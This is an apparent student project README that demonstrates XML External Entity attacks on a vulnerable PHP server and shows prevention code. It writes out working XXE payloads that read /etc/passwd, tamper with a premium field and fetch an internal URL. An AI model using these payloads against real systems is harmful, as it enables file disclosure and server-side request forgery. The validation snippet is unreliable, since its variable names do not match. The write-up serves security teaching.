# Language Based Security #

## Project Title: XML External Entities and Security

## Project Summary
The program that parses XML input is subjected to an XML external entity attack. Most XML parsers are vulnerable to XML attacks, hence it is the developer's job to ensure that the application is not vulnerable. The exploitation of susceptible XML processors, code, dependencies, and integration is part of the XML external entities attack.

Techniques to Detect XXE:

    * API Security Gateways
    * Virtual patching
    * Web apllication firewalls

Techniques to Prevent XXE:

	* Server-side input validation
	* Usage of dependency checker
	* Use of less complex data strcture
	* Time to to time upgrade of XML processors
	* Disable XML external entity andDTD processing
	* Use of source code analysis tools


## Introduction
XML external entity attack is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to retrieve files on the application server's file system, as well as interact with any back-end or external systems that the application can access.

By exploiting the XXE vulnerability to launch server-side request forgery (SSRF) attacks, an attacker can escalate a XXE attack to compromise the underlying server or other back-end infrastructure.

External XML entities are a sort of custom XML entity whose defined values are loaded from a source other than the DTD in which they are declared. External entities are particularly relevant from the standpoint of security since they enable an entity to be defined based on the contents of a file path or URL.

In this project, we have demonstrated the popular XML External Entity attack on the vulnerable server. And have implemented the preventative techniques to reverse the effects.

There are numerous firms that provide services/API to various domains in today's world. For example, many websites offer the option of logging in using a Google account, which uses Google's authentication service in the background. A lot of times, client systems frequently exploit these servers due to simple input and output vulnerabilities.

In this project, we have used simple prevention techniques such as server-side input validation, output sanitization, less complex data structure and use of source code analysis tool SonarQube to prevet XXE attack.

In conclusion, with the use of prevention techniques we were able to prevent attacks involving the use of XXE to retrieve files, SSRF attacks, and the use of blind XXE to retrieve data via error message.


## Background
The structure of an XML document is defined by the XML 1.0 standard. The standard describes the concept of an entity, which is a type of storage unit. External general/parameter parsed entity, frequently reduced to external entity, is one of several types of entities that can access local or remote content via a defined system identifier.

When processing the entity, the system identifier is expected to be a URI that the XML processor can access. The XML processor then substitutes the contents accessed by the system identifier for occurrences of the identified external entity. If the system identifier contains tainted data and the XML processor accessess it, the XML processor may reveal secret information that the application typically does not have access to.

External DTDs, external style sheets, external schemas, and other attack vectors are similar in that they use external DTDs, external style sheets, and external schemas, which, when included, allow for comparable external resource inclusion style attacks. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

Using file: schemes or relative paths in the system identifier, attackers can expose local files that may contain sensitive data such as passwords or private user data. An attacker might use this trusted application to pivot to other internal systems, potentially releasing other internal content via HTTP(s) requests or executing a CSRF attack on any unprotected internal services, because the attack occurs relative to the application parsing the XML document.

In some cases, a client-side memory corruption vulnerability in an XML processor library can be exploited by dereferencing a malicious URI, potentially allowing arbitrary code execution under the application account. Other attacks can get access to local resources that will continue to return data, potentially affecting application availability if too many threads or processes are not released.

Risk factors for XXE attack are:

	* Application parsing XML input/document
    * Tainted data is allowed within the system identifier, within DTD
	* XML processor is configured to validate and process the DTD
    * XML processor is configured to resolve external entities within DTD 

Almost all XXE flaws are caused by the application's XML parsing library supporting potentially harmful XML capabilities that the program does not require or intend to utilize. Disabling those functionalities is the simplest and most efficient technique which is used by developer to prevent XXE attack.

Disabling resolution of external entities and support for XInclude is usually sufficient. This is normally accomplished using configuration settings or by altering default behavior programmatically.

## Project Description
We have developed client-server architecture to demonstrate the XML external attack on vulnerable server and on the secure server we have prevented the attack using simple prevention techniques

The below image shows how the client will communicate with non-secure server and can access the data of server with simple XML input/Document. As the server is not developed to prevent these attacks, the server will send the sensitive information to client in error message of as a response data.

![alt text](report_imgs/non-secure.png)

The issue in the above image has been rectified in the secure server, where server validates the XML input/Document and also sanitizes the output before sharing the same with client. 

![alt text](report_imgs/secure.png)

The code structure of the same can be seen in the below image. The folder XXE-UI belogs to client and others [secure, classes and non-secure] will be used at server to process client requests

![alt text](report_imgs/codeStruct.png)

To run this project, we require two APACHE servers so one can act as a server and other can be client. This project will run on APACHE, PHP and MySQL setup at both sides [server & client]. The tech stack used on both the servers is mentioned in the below image

![alt text](report_imgs/techStack.png)

### Payloads to perform XXE exploitation 

Access etc/passwd file of server

    <?xml version='1.0' encoding='ISO-8859-1'?>
    <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM 'file:///etc/passwd'>]> 
    <creds> 
        <user>&xxe;</user> <pass>mypass</pass> 
    </creds>

Change the value of premium parameter to 10/year irrespective of anything 

    <?xml version='1.0' encoding='ISO-8859-1'?>
    <!DOCTYPE replace [<!ENTITY xxe '10/year'> ]>
    <req>   
        <insurance_id>1</insurance_id>
        <company>PSI</company>
        <type>Health</type>
        <coverage>500000</coverage>
        <premium>&xxe;</premium>
        <name>Vannice</name><date>2021-12-02</date>
        <addr>Dayton, OH</addr>
    </req>   

Steal Local files

    <?xml version="1.0" encoding="ISO-8859-1"?> 
    <!DOCTYPE foo [
    <!ELEMENT foo ANY><!ENTITY xxe SYSTEM
    "http://192.168.0.1/secret.txt">]>
    <foo>  &xxe; </foo>

## Results

### Observed Findings
* The easiest and safest way to prevent against XXE attacks it to completely disable Document Type Definitions

        libxml_disable_entity_loader(true);


* Sanitize XML where it contains DOCTYPE
    
        $dom = new DOMDocument();
        $dom->loadXML($xml);
        foreach ($dom->childNodes as $child) {
          if($child->nodeType == XML_DOCUMENT_TYPE_NODE) {
            throw new \InvalidArgumentException('Invalid XML: Detected use of illegal DOCTYPE');
          }
        }

* Input Validation for quick detection

        $collapsedXML = preg_replace("/[:space:]/", '', $xml);
        if(preg_match("/<!DOCTYPE/i", $collapsedXml)) {
           throw new \InvalidArgumentException(
           'Invalid XML: Detected use of illegal DOCTYPE'
           );
        }

### Accomplishments
    
    - Client UI : Insurance listing page, insurance purchase confirmation page
    - Secure Server : Authenticate service and  buy insurance service [Stores data in DB and sends status response]
    - Non-secure server : Authnticate service
    - SonarQube to analyze the server's code [Configuration issue on my laptop(Ubuntu OS)]
    - System and database setup
    - Client UI :  authenticate page, common CSS, buy insurance form to send secure and non-secure requests 
    - Server    :  Buy insurance on non-secure server [Responds with the data itself]


## Appendix
### XXE attack demonstration

* Read server's etc/host file using authenticate service
    ![alt text](report_imgs/autheticate_attack.png)


* Change the premium value parameter
  ![alt text](report_imgs/buy_attack.png)


* Successfully accepted premium as 10/year
  ![alt text](report_imgs/buy_attack_success.png)


### XXE attack prevention

* Prevented attack of stealing server's file
  ![alt text](report_imgs/authenticate_prevented.png)


* Prevented attack of change in premium
![alt text](report_imgs/attack_prevented_purchase.png)


